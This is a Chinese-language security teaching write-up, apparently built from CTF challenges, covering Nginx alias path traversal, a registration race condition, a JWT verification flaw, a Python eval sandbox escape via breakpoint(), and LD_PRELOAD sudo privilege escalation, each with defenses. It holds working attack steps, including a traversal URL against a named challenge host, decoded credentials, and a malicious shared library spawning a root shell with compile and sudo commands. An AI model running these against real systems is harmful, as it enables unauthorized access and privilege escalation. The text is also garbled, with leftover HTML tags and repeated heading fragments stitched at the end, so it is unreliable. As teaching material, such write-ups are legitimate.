Nginx 不安全配置与 Web 安全漏洞利用教学文档<\/h1>

目录<\/h2>

Nginx 不安全配置导致的目录遍历漏洞<\/a><\/li>
条件竞争漏洞利用<\/a><\/li>
JWT 安全与特权提升<\/a><\/li>
Python 沙箱逃逸<\/a><\/li>

Nginx 不安全配置导致的目录遍历漏洞<\/h2>

当 Nginx 配置中使用别名(alias)而非根目录(root)时，如果路径末尾没有添加斜杠(\/)，可能导致目录遍历漏洞。<\/p>

错误配置示例<\/strong>:<\/p>

location<\/span> \/images<\/span> {
<\/span><\/span>    alias<\/span> \/app\/src\/images\/<\/span>;  # 正确应该在路径末尾加斜杠
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方法<\/h3>
通过访问 http:\/\/example.com\/images..\/<\/code>，实际会解析为 \/app\/src\/images\/..\/<\/code>，即 \/app\/src\/<\/code> 目录。<\/p>
实际案例<\/h3>
在题目中，通过访问 http:\/\/exp.cybergame.sk:7000\/images..\/<\/code> 可以读取到 index.js<\/code> 文件，其中包含 base64 编码的凭据：<\/p>
cHIxbmNlc3M6U0stQ0VSVHswZmZfYnlfNF9zMW5nbGVfc2w0c2hfZjgzNmE4YjF9
<\/code><\/pre>
解码后获得登录凭证：<\/p>
pr1ncess:SK-CERT{0ff_by_4_s1ngle_sl4sh_f836a8b1}
<\/code><\/pre>
防御措施<\/h3>

始终在别名路径末尾添加斜杠<\/li>
使用 root<\/code> 而非 alias<\/code> 当可能时<\/li>
限制访问敏感目录<\/li>
<\/ol>
条件竞争漏洞利用<\/h2>
漏洞场景<\/h3>
在用户注册流程中，存在时间窗口期：<\/p>

用户注册后数据首先存入数据库（此时 verified<\/code> 为 true）<\/li>
随后调用 sendEmailToAdministrator<\/code> 将 verified<\/code> 设为 false<\/li>
<\/ol>
利用方法<\/h3>

快速注册用户<\/li>
在 verified<\/code> 被设为 false 前立即登录<\/li>
<\/ol>
技术细节<\/h3>

注册后立即发送登录请求<\/li>
可能需要自动化脚本实现快速操作<\/li>
成功登录后可访问受限资源<\/li>
<\/ul>
防御措施<\/h3>

使用事务确保数据一致性<\/li>
在单个原子操作中设置所有属性<\/li>
避免依赖客户端操作顺序<\/li>
<\/ol>
JWT 安全与特权提升<\/h2>
JWT 结构<\/h3>
标准 JWT 格式：header.payload.signature<\/code><\/p>
漏洞利用<\/h3>
题目中的 verifyToken<\/code> 函数存在逻辑缺陷：<\/p>
function<\/span> verifyToken<\/span>(token<\/span>) {
<\/span><\/span>    const<\/span> parts<\/span> =<\/span> token<\/span>.split<\/span>('.'<\/span>);
<\/span><\/span>    \/\/ 错误：只验证最后两部分，忽略中间部分
<\/span><\/span><\/span><\/span>    const<\/span> payload<\/span> =<\/span> parts<\/span>[1<\/span>];  \/\/ 实际使用的payload
<\/span><\/span><\/span><\/span>    const<\/span> verifyPayload<\/span> =<\/span> parts<\/span>[parts<\/span>.length<\/span>-<\/span>2<\/span>];  \/\/ 用于验证的payload
<\/span><\/span><\/span><\/span>    \/\/ ...验证逻辑...
<\/span><\/span><\/span><\/span>    return<\/span> JSON<\/span>.parse<\/span>(base64decode<\/span>(payload<\/span>));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>攻击步骤<\/h3>

获取合法 token：header.payload.signature<\/code><\/li>
构造恶意 token：header.evilPayload.payload.signature<\/code>

evilPayload<\/code> 包含特权字段：is_d4rk_pr1nc3ss: true<\/code><\/li>
<\/ul>
<\/li>
服务器会使用 payload<\/code> 验证签名，但返回 evilPayload<\/code><\/li>
<\/ol>
防御措施<\/h3>

严格验证 JWT 结构应为三部分<\/li>
使用标准库处理 JWT<\/li>
定期轮换签名密钥<\/li>
<\/ol>
Python 沙箱逃逸<\/h2>
漏洞场景<\/h3>
计算器程序存在以下问题：<\/p>

使用 eval()<\/code> 或类似危险函数<\/li>
过滤不充分<\/li>
<\/ol>
利用方法<\/h3>

发现 breakpoint()<\/code> 未被过滤<\/li>
通过 breakpoint 启动交互式 shell

breakpoint()<\/code> 会调用 pdb.set_trace()<\/code><\/li>
在 pdb 中可执行任意 Python 代码<\/li>
<\/ul>
<\/li>
<\/ol>
防御措施<\/h3>

避免使用 eval()<\/code>\/exec()<\/code><\/li>
使用 AST 解析器限制可用语法<\/li>
在容器中运行不受信任代码<\/li>
<\/ol>
Linux 提权技术<\/h2>
漏洞原理<\/h3>
通过 LD_PRELOAD<\/code> 环境变量注入恶意共享库到 SUID 程序中。<\/p>
利用条件<\/h3>

有权限设置 LD_PRELOAD<\/code><\/li>
目标程序是动态链接的<\/li>
目标程序具有更高权限<\/li>
<\/ol>
攻击步骤<\/h3>

检查可用程序：sudo -l<\/code><\/li>
确认程序是否动态链接：file \/bin\/netstat<\/code><\/li>
创建恶意共享库：<\/li>
<\/ol>
\/\/ shell.c
<\/span><\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/types.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> _init<\/span>() {
<\/span><\/span>    unsetenv("LD_PRELOAD"<\/span>);
<\/span><\/span>    system("\/bin\/sh -i"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
编译：gcc -fPIC -shared -o shell.so shell.c -nostartfiles<\/code><\/li>
执行：sudo LD_PRELOAD=.\/shell.so netstat<\/code><\/li>
<\/ol>
防御措施<\/h3>

避免不必要的 SUID 程序<\/li>
使用 capabilities<\/code> 替代 SUID<\/li>
定期审计系统权限配置<\/li>
<\/ol>
总结<\/h2>
这些漏洞展示了 Web 应用和系统安全中的常见问题：<\/p>

配置错误导致的未授权访问<\/li>
竞态条件引发的逻辑漏洞<\/li>
认证机制实现缺陷<\/li>
不安全的代码执行<\/li>
权限提升漏洞<\/li>
<\/ol>
防御关键在于：<\/p>

最小权限原则<\/li>
输入验证和输出编码<\/li>
安全配置检查<\/li>
使用经过验证的安全机制<\/li>
<\/ul>

Nginx 不安全配置与 Web 安全漏洞利用教学文档<\/h1>

Nginx 不安全配置导致的目录遍历漏洞<\/h2>

利用方法<\/h3>
通过访问 `http:\/\/example.com\/images..\/<\/code>，实际会解析为 \/app\/src\/images\/..\/<\/code>，即 \/app\/src\/<\/code> 目录。<\/p>`

条件竞争漏洞利用<\/h2>

JWT 安全与特权提升<\/h2>

JWT 结构<\/h3>
标准 JWT 格式：`header.payload.signature<\/code><\/p>`

Python 沙箱逃逸<\/h2>

Linux 提权技术<\/h2>

漏洞原理<\/h3>
通过 `LD_PRELOAD<\/code> 环境变量注入恶意共享库到 SUID 程序中。<\/p>`

Nginx 不安全配置与 Web 安全漏洞利用教学文档<\/h1>

Nginx 不安全配置导致的目录遍历漏洞<\/h2>

利用方法<\/h3> 通过访问 http:\/\/example.com\/images..\/<\/code>，实际会解析为 \/app\/src\/images\/..\/<\/code>，即 \/app\/src\/<\/code> 目录。<\/p>

条件竞争漏洞利用<\/h2>

JWT 安全与特权提升<\/h2>

JWT 结构<\/h3> 标准 JWT 格式：header.payload.signature<\/code><\/p>

Python 沙箱逃逸<\/h2>

Linux 提权技术<\/h2>

漏洞原理<\/h3> 通过 LD_PRELOAD<\/code> 环境变量注入恶意共享库到 SUID 程序中。<\/p>

利用方法<\/h3>
通过访问 `http:\/\/example.com\/images..\/<\/code>，实际会解析为 \/app\/src\/images\/..\/<\/code>，即 \/app\/src\/<\/code> 目录。<\/p>`

JWT 结构<\/h3>
标准 JWT 格式：`header.payload.signature<\/code><\/p>`

漏洞原理<\/h3>
通过 `LD_PRELOAD<\/code> 环境变量注入恶意共享库到 SUID 程序中。<\/p>`